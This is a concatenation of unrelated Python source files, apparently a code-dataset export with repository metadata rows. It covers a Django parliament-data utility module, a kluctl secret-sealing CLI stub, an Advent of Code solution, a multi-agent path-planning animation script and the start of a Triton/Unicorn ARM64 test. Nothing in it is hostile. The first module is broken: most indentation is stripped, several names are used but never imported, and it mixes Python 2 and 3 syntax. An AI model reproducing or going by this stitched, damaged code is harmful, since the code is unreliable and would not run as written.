from parlaposlanci.models import (Person, StyleScores, CutVotes, MPStaticPL,
MembershipsOfMember, LessEqualVoters,
EqualVoters, Presence,
AverageNumberOfSpeechesPerSession,
VocabularySize, Compass, SpokenWords,
LastActivity, MinisterStatic)
from parlaskupine.models import (Organization, WorkingBodies,
CutVotes as CutVotesPG,
DeviationInOrganization, LessMatchingThem,
MostMatchingThem, PercentOFAttendedSession,
MPOfPg, PGStatic,
VocabularySize as VocabularySizePG,
StyleScores as StyleScoresPG)
from parlaseje.models import (VoteDetailed, Session, Vote, Ballot, Speech,
PresenceOfPG, AbsentMPs, VoteDetailed)
from parlalize.settings import (VOTE_MAP, API_URL, BASE_URL, API_DATE_FORMAT,
DEBUG)
from django.contrib.contenttypes.models import ContentType
import requests
import json
import numpy as np
import time
import csv
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from parlalize.settings import SETTER_KEY
def lockSetter(function):
def wrap(request, *args, **kwargs):
if request:
setterKey = request.GET.get('key')
if str(setterKey) == str(SETTER_KEY):
return function(request, *args, **kwargs)
else:
raise PermissionDenied
else:
return function(*args, **kwargs)
return wrap
def tryHard(url):
data = None
counter = 0
while data is None:
try:
if counter > 2:
client.captureMessage(url+' je zahinavu več ko 2x.')
return
data = requests.get(url)
except:
counter += 1
time.sleep(5)
pass
return data
def normalize(val, max_):
try:
return round((float(val)*100)/float(max_))
except:
return val
def saveOrAbort(model, **kwargs):
savedModel = model.objects.filter(**kwargs)
if savedModel:
if model != LastActivity:
lastModel = model.objects.latest('created_at')
if savedModel.latest('created_at').id != lastModel.id:
newModel = model(**kwargs)
newModel.save()
return True
else:
return False
else:
newModel = model(**kwargs)
newModel.save()
return True
return False
def saveOrAbortNew(model, **kwargs):
"""
usage:
watch parlaposlanci/views.py:setMembershipsOfMember
if you use saveOrAbortNew in setter you need to use
getPersonCardModelNew in getter
"""
def save_it(model, created_for, **kwargs):
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
if model != LastActivity:
created_for = kwargs.pop('created_for')
savedModel = model.objects.filter(**kwargs)
if savedModel:
if 'person' in kwargs:
if model != LastActivity:
person_id = kwargs['person'].id_parladata
cards = model.objects.filter(person__id_parladata=person_id,
created_for__lte=created_for)
if cards:
lastDate = cards.latest('created_for').created_for
else:
lastDate = datetime.min
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
elif 'organization' in kwargs:
party_id = kwargs['organization'].id_parladata
models = model.objects.filter(organization__id_parladata=party_id,
created_for__lte=created_for)
if models:
lastDate = models.latest('created_for').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
save_it(model, created_for, **kwargs)
elif 'session' in kwargs:
ses_id = kwargs['session'].id_parladata
models = model.objects.filter(session__id_parladata=ses_id)
lastDate = models.latest('created_at').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
if model != LastActivity:
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
return False
def findDatesFromLastCard(model, id, lastParsedDate, minDate=None):
toDate = datetime.strptime(lastParsedDate, '%d.%m.%Y').date()
print model._meta.app_label
try:
if model._meta.app_label == 'parlaposlanci':
models = model.objects.filter(person__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaskupine':
models = model.objects.filter(organization__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaseje':
models = model.objects.all()
lastCardDate = models.order_by('-created_for')[0].created_for
except:
lastCardDate = datetime.strptime('02.08.2014', '%d.%m.%Y').date()
if minDate:
od = datetime.strptime(minDate, '%d.%m.%Y').date()
lastCardDate = datetime.strptime(minDate, '%d.%m.%Y').date()
if od > lastCardDate:
lastCardDate = od
return [(lastCardDate+timedelta(days=days))
for days
in range((toDate-lastCardDate).days)]
def datesGenerator(stDate, toDate):
dates = [(stDate + timedelta(days=x))
for x
in range(0, (toDate - stDate).days)]
return dates
def getPersonCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
if DEBUG:
raise Http404('Nismo našli kartice' + str(model)+str(id))
else:
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
latest_day = modelObject.latest('created_for').created_for
print latest_day
if len(modelObject.filter(created_for=latest_day)) > 1:
models = modelObject.filter(created_for=latest_day)
modelObject = models.latest('created_at')
else:
modelObject = modelObject.latest('created_for')
else:
date = modelObject.latest('created_for').created_for
models = modelObject.filter(created_for=date)
modelObject = models.latest('created_at')
return modelObject
def getPersonCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=dateObj)
else:
dateObj
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=dateObj)
else:
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=datetime.now())
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
if model == LastActivity:
return None
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
modelObject = modelObject.latest('date')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
raise Http404('Nismo našli kartice')
else:
date = modelObject.latest('created_for').created_for
modelObject = modelObject.filter(created_for=date).latest('created_at')
return modelObject
def getSCardModel(model, id_se, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getIDs():
# create persons
result = []
# getAllPeople
data = tryHard(API_URL+'/getAllPeople').json()
# data = tryHard(API_URL+'/getMPs').json()
for mp in data:
result.append(mp['id'])
return result
# get all PG ID's
def getPGIDs():
data = tryHard(API_URL+'/getAllPGsExt/').json()
return [pg for pg in data]
def getMPGovId(id_parladata):
person = Person.objects.filter(id_parladata=id_parladata)[0]
out = {'id': person.id_parladata,
'gov_id': person.gov_id}
return out
def getPersonData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MPStaticPL, id_parladata, date_)
except:
url = API_URL + '/getPersonData/' + str(id_parladata) + '/'
guest = tryHard(url).json()
gov_id = None
if guest and guest['gov_id']:
return {
'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': guest['gov_id'],
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
else:
return {'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': None,
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
party = Organization.objects.get(id_parladata=data.party_id)
partyData = party.getOrganizationData()
return {
'type': 'mp',
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': partyData,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == 'True' else False,
'has_function': data.person.has_function,
}
def getMinistryData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MinisterStatic, id_parladata, date_)
return {
'type': "ministry",
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': data.party.getOrganizationData() if data.party else None,
'ministry': data.ministry.getOrganizationData() if data.ministry else None,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == "True" else False,
'has_function': data.person.has_function,
}
except:
return getPersonData(id_parladata, date_)
def getPersonDataAPI(request, id_parladata, date_=None):
data = getPersonData(id_parladata, date_)
return JsonResponse(data)
def modelsData(request):
out = []
for ct in ContentType.objects.all():
m = ct.model_class()
out.append({'model': m.__module__,
'Ime modela': m.__name__,
'st:': m._default_manager.count()})
return JsonResponse(out, safe=False)
def getAllStaticData(request, force_render=False):
date_of = datetime.now().date()
date_ = date_of.strftime(API_DATE_FORMAT)
c_data = cache.get('all_statics')
if c_data and not force_render:
out = c_data
else:
PS_NP = ['poslanska skupina', 'nepovezani poslanec']
date_ = datetime.now().strftime(API_DATE_FORMAT)
out = {'persons': {}, 'partys': {}, 'wbs': {}}
for person in Person.objects.all():
personData = getPersonData(person.id_parladata,
date_)
out['persons'][person.id_parladata] = personData
parliamentary_group = Organization.objects.filter(classification__in=PS_NP)
for party in parliamentary_group:
out['partys'][party.id_parladata] = party.getOrganizationData()
working_bodies = ['odbor', 'komisija', 'preiskovalna komisija']
orgs = Organization.objects.filter(classification__in=working_bodies)
out['wbs'] = [{'id': org.id_parladata,
'name': org.name} for org in orgs]
cache.set('all_statics', out, 60 * 60 * 48)
return JsonResponse(out)
def getPersonsCardDates(request, person_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(person_id) + ''
'.csv"')
mems = tryHard(API_URL + '/getAllTimeMemberships').json()
member_dates = [mem for mem in mems if str(mem['id']) == person_id]
dates = {}
dates['is_member'] = []
for d in member_dates:
if d['start_time']:
start = datetime.strptime(d['start_time'].split('T')[0],
'%Y-%m-%d')
else:
start = datetime(day=1, month=8, year=2014)
if d['end_time']:
end = datetime.strptime(d['end_time'].split('T')[0],
'%Y-%m-%d')
else:
end = datetime.today()
while end > start:
dates['is_member'].append(start.strftime(API_DATE_FORMAT))
start = start+timedelta(days=1)
models = {'spoken': SpokenWords,
'presence': Presence,
'style': StyleScores,
'equal': EqualVoters,
'less_equal': LessEqualVoters,
'static': MPStaticPL,
'number_of_speeches': AverageNumberOfSpeechesPerSession,
'memberships': MembershipsOfMember,
'last_activity': LastActivity,
'vocabolary_size': VocabularySize,
}
    for key, model in models.items():
modelz = model.objects.filter(person__id_parladata=person_id)
datez = modelz.order_by('created_for').values_list('created_for',
flat=True)
dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
writer = csv.writer(response)
    keys = list(dates.keys())
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
        print(date)
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def getOrgsCardDates(request, org_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(org_id) + ''
'.csv"')
dates = {}
models = {'PGStatic': PGStatic,
'PercentOFAttendedSession': PercentOFAttendedSession,
'MPOfPg': MPOfPg,
'MostMatchingThem': MostMatchingThem,
'LessMatchingThem': LessMatchingThem,
'DeviationInOrganization': DeviationInOrganization,
'vocabulary_size': VocabularySizePG,
'style_scores': StyleScoresPG,
}
    for key, model in models.items():
        modelz = model.objects.filter(organization__id_parladata=org_id)
        datez = modelz.order_by('created_for').values_list('created_for',
                                                           flat=True)
        dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
writer = csv.writer(response)
    keys = list(dates.keys())
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
        print(date)
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def monitorMe(request):
r = requests.get(BASE_URL + '/p/getMPStatic/2/')
if r.status_code == 200:
return HttpResponse('All iz well.')
else:
return HttpResponse('PANIC!')
def printProgressBar(iteration,
total,
prefix='',
suffix='',
decimals=1,
length=100,
fill='█'):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
"""
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filledLength = int(length * iteration // total)
bar = fill * filledLength + '-' * (length - filledLength)
print('\r' + prefix + '|' + bar + '|' + percent + suffix + '\r')
if iteration == total:
print()
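# Illustrative call pattern (`total` and `do_work` are placeholders, not part
# of this module):
#   for i in range(1, total + 1):
#       do_work()
#       printProgressBar(i, total, prefix='Progress:', length=40)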
1c4a8b7192fcfef250b74c73b64732c53563f6c6 | 1,585 | py | Python | kluctl/cli/seal_command_stubs.py | matzegebbe/kluctl | 1b092b921e7301a30c99792b026634e099fbf15d | ["Apache-2.0"] | 26 | 2021-08-18T11:18:46.000Z | 2022-03-16T09:28:43.000Z | kluctl/cli/seal_command_stubs.py | matzegebbe/kluctl | 1b092b921e7301a30c99792b026634e099fbf15d | ["Apache-2.0"] | 4 | 2021-09-07T09:55:29.000Z | 2022-03-03T09:05:01.000Z | kluctl/cli/seal_command_stubs.py | matzegebbe/kluctl | 1b092b921e7301a30c99792b026634e099fbf15d | ["Apache-2.0"] | 4 | 2021-09-04T11:52:33.000Z | 2022-03-16T09:18:20.000Z |
import click
from click_option_group import optgroup
from kluctl.cli.main_cli_group import kluctl_project_args, cli_group
@cli_group.command("seal",
help="Seal secrets based on target's sealingConfig.\n\n"
"Loads all secrets from the specified secrets sets from the target's sealingConfig and "
"then renders the target, including all files with the `.sealme` extension. Then runs "
"kubeseal on each `.sealme` file and stores secrets in the directory specified by "
"`--local-sealed-secrets`, using the outputPattern from your deployment project.\n\n"
"If no `--target` is specified, sealing is performed for all targets.")
@kluctl_project_args()
@optgroup.group("Misc arguments")
@optgroup.option("--secrets-dir",
help="Specifies where to find unencrypted secret files. The given directory is NOT meant to be part "
"of your source repository! The given path only matters for secrets of type 'path'. Defaults "
"to the current working directory.",
default='.', type=click.Path(exists=True, file_okay=False))
@optgroup.option("--force-reseal",
help="Lets kluctl ignore secret hashes found in already sealed secrets and thus forces "
"resealing of those.",
is_flag=True)
@click.pass_obj
def seal_command_stub(obj, **kwargs):
from kluctl.seal.seal_command import seal_command
seal_command(obj, kwargs)
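# Hypothetical invocation of the command defined above ("prod" is an assumed
# target name; --secrets-dir and --force-reseal are the options declared here):
#   kluctl seal --target prod --secrets-dir ./unencrypted-secrets --force-reseal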
1c4a8c258378ad8f2a962e64c0b2b5d11bc73837 | 375 | py | Python | 2015/10/part2.py | timofurrer/aoc-2020 | 446b688a57601d9891f520e43b7f822c373a6ff4 | ["MIT"] | null | null | null | 2015/10/part2.py | timofurrer/aoc-2020 | 446b688a57601d9891f520e43b7f822c373a6ff4 | ["MIT"] | null | null | null | 2015/10/part2.py | timofurrer/aoc-2020 | 446b688a57601d9891f520e43b7f822c373a6ff4 | ["MIT"] | null | null | null |
from pathlib import Path
with (Path(__file__).parent / "input.txt").open() as puzzle_input_file:
puzzle_input_raw = puzzle_input_file.read()
import itertools
number = puzzle_input_raw
def look_and_say(look):
return ''.join(str(len([1 for _ in v])) + k for k, v in itertools.groupby(look))
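# Worked example: itertools.groupby("111221") yields ('1', '111'), ('2', '22'),
# ('1', '1'), so look_and_say("111221") == "31" + "22" + "11" == "312211".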
for _ in range(50):
number = look_and_say(number)
print(len(number))
1c4a8d43ec29814bf33a1a684899d96c24b15fbe | 13,571 | py | Python | utils/visualize.py | vtekur/gnn_pathplanning | 150ca315c214134eda8f5c5b55ce71da9360bcce | ["MIT"] | null | null | null | utils/visualize.py | vtekur/gnn_pathplanning | 150ca315c214134eda8f5c5b55ce71da9360bcce | ["MIT"] | null | null | null | utils/visualize.py | vtekur/gnn_pathplanning | 150ca315c214134eda8f5c5b55ce71da9360bcce | ["MIT"] | null | null | null |
#!/usr/bin/env python3
import yaml
import matplotlib
# matplotlib.use("Agg")
from matplotlib.patches import Circle, Rectangle, Arrow
from matplotlib.collections import PatchCollection
from matplotlib.patches import ConnectionPatch
from matplotlib.patches import FancyArrowPatch
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from matplotlib import lines
import matplotlib.animation as manimation
import argparse
import math
import gc
import seaborn as sns
import time
import scipy.io as sio
import sys
np.set_printoptions(threshold=np.inf)
class Animation:
def __init__(self, config):
self.config = config
with open(config.map) as map_file:
            self.data_map = yaml.load(map_file, Loader=yaml.SafeLoader)
with open(config.schedule) as states_file:
            self.schedule = yaml.load(states_file, Loader=yaml.SafeLoader)
self.num_agents = len(self.data_map["agents"])
self.K = self.config.nGraphFilterTaps
self.ID_agent = self.config.id_chosenAgent
data_contents = sio.loadmat(config.GSO)
self.GSO = np.transpose(data_contents["gso"], (2, 3, 0, 1)).squeeze(3)
self.commRadius = data_contents["commRadius"]
self.maxLink = 500
aspect = self.data_map["map"]["dimensions"][0] / self.data_map["map"]["dimensions"][1]
self.fig = plt.figure(frameon=False, figsize=(4 * aspect, 4))
self.ax = self.fig.add_subplot(111, aspect='equal')
self.fig.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=None, hspace=None)
# self.ax.set_frame_on(False)
self.patches = []
self.artists = []
self.agents = dict()
self.commLink = dict()
self.agent_names = dict()
# self.list_color = self.get_cmap(self.num_agents)
self.list_color = sns.color_palette("hls", self.num_agents)
self.list_color_commLink = sns.color_palette("hls", 8) # self.K)
self.list_commLinkStyle = list(lines.lineStyles.keys())
# create boundary patch
xmin = -0.5
ymin = -0.5
xmax = self.data_map["map"]["dimensions"][0] - 0.5
ymax = self.data_map["map"]["dimensions"][1] - 0.5
# self.ax.relim()
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
# self.ax.set_xticks([])
# self.ax.set_yticks([])
# plt.axis('off')
# self.ax.axis('tight')
# self.ax.axis('off')
self.patches.append(Rectangle((xmin, ymin), xmax - xmin, ymax - ymin, facecolor='none', edgecolor='black'))
for o in self.data_map["map"]["obstacles"]:
x, y = o[0], o[1]
self.patches.append(Rectangle((x - 0.5, y - 0.5), 1, 1, facecolor='black', edgecolor='black'))
# initialize communication Link
for id_link in range(self.maxLink):
#https://matplotlib.org/api/artist_api.html#module-matplotlib.lines
name_link = "{}".format(id_link)
# self.commLink[name_link] = FancyArrowPatch((0,0), (0,0),linewidth=2)
self.commLink[name_link] = plt.Line2D((0, 0), (0, 0), linewidth=2)
self.artists.append(self.commLink[name_link])
# print(self.schedule["schedule"])
# create agents:
self.T = 0
# draw goals first
for d, i in zip(self.data_map["agents"], range(0, self.num_agents)):
self.patches.append(
Rectangle((d["goal"][0] - 0.25, d["goal"][1] - 0.25), 0.6, 0.6, facecolor=self.list_color[i],
edgecolor=self.list_color[i], alpha=0.5))
for d, i in zip(self.data_map["agents"], range(0, self.num_agents)):
#https://matplotlib.org/api/artist_api.html#module-matplotlib.lines
name = d["name"]
self.agents[name] = Circle((d["start"][0], d["start"][1]), 0.4, facecolor=self.list_color[i],
edgecolor=self.list_color[i])
self.agents[name].original_face_color = self.list_color[i]
self.patches.append(self.agents[name])
self.T = max(self.T, self.schedule["schedule"][name][-1]["t"])
# set floating ID
self.agent_names[name] = self.ax.text(d["start"][0], d["start"][1], name.replace('agent', ''))
self.agent_names[name].set_horizontalalignment('center')
self.agent_names[name].set_verticalalignment('center')
self.artists.append(self.agent_names[name])
# self.ax.add_line(dotted_line)
# self.ax.set_axis_off()
# self.fig.axes[0].set_visible(False)
# self.fig.axes.get_yaxis().set_visible(False)
# self.fig.tight_layout()
self.anim = animation.FuncAnimation(self.fig, self.animate_func,
init_func=self.init_func,
frames=int(self.T + 1) * 10,
interval=100,
blit=True)
def get_cmap(self, n, name='hsv'):
'''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct
RGB color; the keyword argument name must be a standard mpl colormap name.'''
return plt.cm.get_cmap(name, n)
def save(self, file_name, speed):
self.anim.save(
file_name,
"ffmpeg",
fps=10 * speed,
            dpi=200)
# savefig_kwargs={"pad_inches": 0, "bbox_inches": "tight"})
def show(self):
plt.show()
def init_func(self):
for p in self.patches:
self.ax.add_patch(p)
for a in self.artists:
self.ax.add_artist(a)
return self.patches + self.artists
# def find_neighours(self, ID_selected_agent, step, level, max_level=self.K):
def get_currentGSO(self, step):
# module to get GSO
# print(self.GSO.shape)
GSO_current = self.GSO[:, :, step]
# print(GSO_current.shape)
gso_up_diag = np.triu(GSO_current)
# print(gso_up)
# return gso_up_diag
return GSO_current
def update_gso(self, gso_tmp, id_chosenAgent, id_neighborAgent):
gso_tmp[id_chosenAgent, id_neighborAgent] = 0
gso_tmp[id_neighborAgent, id_chosenAgent] = 0
return gso_tmp
def find_neighours(self, gso, id_chosenAgent):
# print(id_chosenAgent)
# print(gso)
ID_neighbor_robot = gso[id_chosenAgent,:].nonzero()[0]
# print(gso_up[ID_selected_agent,:])
# print(ID_neighbor_robot)
return ID_neighbor_robot, ID_neighbor_robot.shape[0]
def build_comm_link(self, store_list_line, gso, id_chosenAgent, index_hop):
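        # Recursively collect the edges reachable from the chosen agent within
        # K-1 hops (K = number of graph-filter taps); each traversed edge is
        # zeroed in the GSO so it is recorded and drawn only once.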
if index_hop >= self.K:
# print('\n {}\n'.format(store_list_line))
return store_list_line
else:
# status_agent_currentHop = agents_array[id_chosenAgent]
id_neighbor_robot, num_neighbor = self.find_neighours(gso, id_chosenAgent)
# pos_agent_currentHop_array = np.array(status_agent_currentHop.center)
# repeat until K
for index in range(num_neighbor):
id_neighbor = id_neighbor_robot[index]
# status_agent_nextHop = agents_array[id_neighbor]
# pos_agent_nextHop_array = np.array(status_agent_nextHop.center)
# draw line (pos1,pos2)
# print('#### current hop {} / {}'.format(index_hop+1,self.K))
# print('\t {} <- \t{}'.format(id_chosenAgent, id_neighbor))
# print('\t {} <- \t{}'.format(status_agent_currentHop, status_agent_nextHop))
# posX_agent = (pos_agent_currentHop_array[0], pos_agent_nextHop_array[0])
# posY_agent = (pos_agent_currentHop_array[1], pos_agent_nextHop_array[1])
line = (index_hop + 1,index_hop-1, (id_chosenAgent, id_neighbor))
name_line = '{}-{}'.format(id_chosenAgent, id_neighbor)
store_list_line.update({name_line:line})
gso_new = self.update_gso(gso,id_chosenAgent,id_neighbor)
store_list_line = self.build_comm_link(store_list_line, gso_new, id_neighbor, index_hop+1)
return store_list_line
def get_linkPos(self,agents_array,id_chosenAgent,id_neighbor):
status_agent_currentHop = agents_array[id_chosenAgent]
pos_agent_currentHop_array = np.array(status_agent_currentHop.center)
status_agent_nextHop = agents_array[id_neighbor]
pos_agent_nextHop_array = np.array(status_agent_nextHop.center)
posX_agent = (pos_agent_currentHop_array[0], pos_agent_nextHop_array[0])
posY_agent = (pos_agent_currentHop_array[1], pos_agent_nextHop_array[1])
return (posX_agent, posY_agent)
def animate_func(self, i):
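        # the animation runs 10 frames per schedule step; rebuild the
        # communication links only when a new step begins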
currentStep = i//10
if i%10 == 0:
gso_current = self.get_currentGSO(currentStep)
self.list_line = self.build_comm_link({}, gso_current, self.ID_agent, 1)
# print(self.list_line)
# print("time-frame:{}/{} - step:{}".format(i,int(self.T + 1) * 10, currentStep))
for agent_name in self.schedule["schedule"]:
agent = self.schedule["schedule"][agent_name]
# print(agent)
pos = self.getState(i / 10, agent)
p = (pos[0], pos[1])
self.agents[agent_name].center = p
self.agent_names[agent_name].set_position(p)
# reset all colors
for _, agent in self.agents.items():
agent.set_facecolor(agent.original_face_color)
# build communcation link
agents_array = [agent for _, agent in self.agents.items()]
id_link = 0
for key_link, line_info in self.list_line.items():
name_link = "{}".format(id_link)
index_hop, index_style, (id_chosenAgent, id_neighbor) = line_info
pos = self.get_linkPos(agents_array, id_chosenAgent, id_neighbor)
self.commLink[name_link].set_data(pos)
self.commLink[name_link].set_color(self.list_color_commLink[index_style])
self.commLink[name_link].set_linestyle(self.list_commLinkStyle[index_style])
# print(self.list_commLinkStyle[index_hop-2])
# print("{}/{}- {} - {}".format(index_hop, self.K, key_link, self.commLink[name_link]._posA_posB))
id_link += 1
id_link_reset = id_link
for id_link_rest in range(id_link_reset, self.maxLink):
name_link = "{}".format(id_link_rest)
self.commLink[name_link].set_data((0, 0), (0, 0))
# check drive-drive collisions
for id_m in range(0, len(agents_array)):
for id_n in range(id_m + 1, len(agents_array)):
# print(i,j)
d1 = agents_array[id_m]
d2 = agents_array[id_n]
pos1 = np.array(d1.center)
pos2 = np.array(d2.center)
# plt.plot(pos1, pos2, 'ro-')
if np.linalg.norm(pos1 - pos2) < 0.7:
d1.set_facecolor('red')
d2.set_facecolor('red')
print("COLLISION! (agent-agent) ({}, {})".format(id_m, id_n))
return self.patches + self.artists
def getState(self, t, d):
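        # Linearly interpolate the agent position between the two schedule
        # waypoints bracketing time t, clamping to the first/last waypoint.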
idx = 0
while idx < len(d) and d[idx]["t"] < t:
idx += 1
if idx == 0:
return np.array([float(d[0]["x"]), float(d[0]["y"])])
elif idx < len(d):
posLast = np.array([float(d[idx - 1]["x"]), float(d[idx - 1]["y"])])
posNext = np.array([float(d[idx]["x"]), float(d[idx]["y"])])
else:
return np.array([float(d[-1]["x"]), float(d[-1]["y"])])
dt = d[idx]["t"] - d[idx - 1]["t"]
t = (t - d[idx - 1]["t"]) / dt
pos = (posNext - posLast) * t + posLast
# print(pos)
return pos
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--local_dir', default='/Users/vtek/gnn_pathplanning/')
parser.add_argument('--nGraphFilterTaps', type=int, default=3)
parser.add_argument('--type')
parser.add_argument('--caseId', default='00000')
parser.add_argument("--speed", type=int, default=2, help="speedup-factor")
parser.add_argument('--log_time_trained', type=str, default='0')
parser.add_argument('--id_chosenAgent', type=int, default=0)
parser.add_argument('--failure_case', type=bool, default=False)
parser.add_argument('--name', default=None)
args = parser.parse_args()
if args.failure_case:
case_type = 'failure'
else:
case_type = 'success'
base_dir = args.local_dir + 'Results_best/AnimeDemo/{}/map20x20_rho1_10Agent/K{}_HS0/TR_M20p1_10Agent/{}/commR_6/'.format(args.type, args.nGraphFilterTaps,args.log_time_trained)
args.map = base_dir + 'input/{}Cases_ID{}.yaml'.format(case_type, args.caseId)
args.schedule = base_dir+'predict_{}/{}Cases_ID{}.yaml'.format(case_type,case_type,args.caseId)
args.GSO = base_dir+'GSO/{}Cases_ID{}.mat'.format(case_type,args.caseId)
if args.name:
args.video = args.local_dir + 'Results_best/' + '/video_K{}_{}_{}.mp4'.format(args.nGraphFilterTaps, args.type, args.name)
else:
args.video = args.local_dir + 'Results_best/' + '/video_K{}_{}.mp4'.format(args.nGraphFilterTaps, args.type)
animation = Animation(args)
if args.video:
print("Starting!")
animation.save(args.video, args.speed)
print("Ending!")
else:
animation.show()
1c4a8d92aa7936b2472071f2adda42a56ce328db | 88,007 | py | Python | src/testers/unicorn_test_aarch64.py | TehRick/Triton | 397e42edb2fb7c3fea12be22f70c44e8d0859d57 | ["Apache-2.0"] | null | null | null | src/testers/unicorn_test_aarch64.py | TehRick/Triton | 397e42edb2fb7c3fea12be22f70c44e8d0859d57 | ["Apache-2.0"] | null | null | null | src/testers/unicorn_test_aarch64.py | TehRick/Triton | 397e42edb2fb7c3fea12be22f70c44e8d0859d57 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
import pprint
from triton import *
from unicorn import *
from unicorn.arm64_const import *
ADDR = 0x100000
STACK = 0x200000
HEAP = 0x300000
SIZE = 5 * 1024 * 1024
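# Each entry pairs raw AArch64 opcode bytes with the assembly it encodes; the
# test harness (further below, outside this excerpt) presumably replays every
# instruction through both Unicorn and Triton and cross-checks the results.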
CODE = [
("\x80\x46\x82\xd2", "movz x0, #0x1234"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x80\x46\xc2\xd2", "movz x0, #0x1234, lsl #32"),
("\x80\x46\xe2\xd2", "movz x0, #0x1234, lsl #48"),
("\x21\x64\x88\xd2", "movz x1, #0x4321"),
("\x21\x64\xa8\xd2", "movz x1, #0x4321, lsl #16"),
("\x21\x64\xc8\xd2", "movz x1, #0x4321, lsl #32"),
("\x21\x64\xe8\xd2", "movz x1, #0x4321, lsl #48"),
("\x21\x64\xe8\xd2", "movz x1, #0x4321, lsl #48"),
("\x21\x64\xc8\xd2", "movz x1, #0x4321, lsl #32"),
("\x21\x64\xa8\xd2", "movz x1, #0x4321, lsl #16"),
("\x21\x64\x88\xf2", "movk x1, #0x4321"),
("\x81\x46\xa2\xf2", "movk x1, #0x1234, lsl #16"),
("\x81\x04\xcf\xf2", "movk x1, #0x7824, lsl #32"),
("\x61\x8a\xf2\xf2", "movk x1, #0x9453, lsl #48"),
("\xe0\xcc\x8c\x52", "movz w0, #0x6667"),
("\xc0\xcc\xac\x72", "movk w0, #0x6666, lsl #16"),
("\x1f\x20\x03\xd5", "nop"),
("\x1f\x20\x03\xd5", "nop"),
("\x1f\x20\x03\xd5", "nop"),
("\x60\x00\x02\x8b", "add x0, x3, x2"),
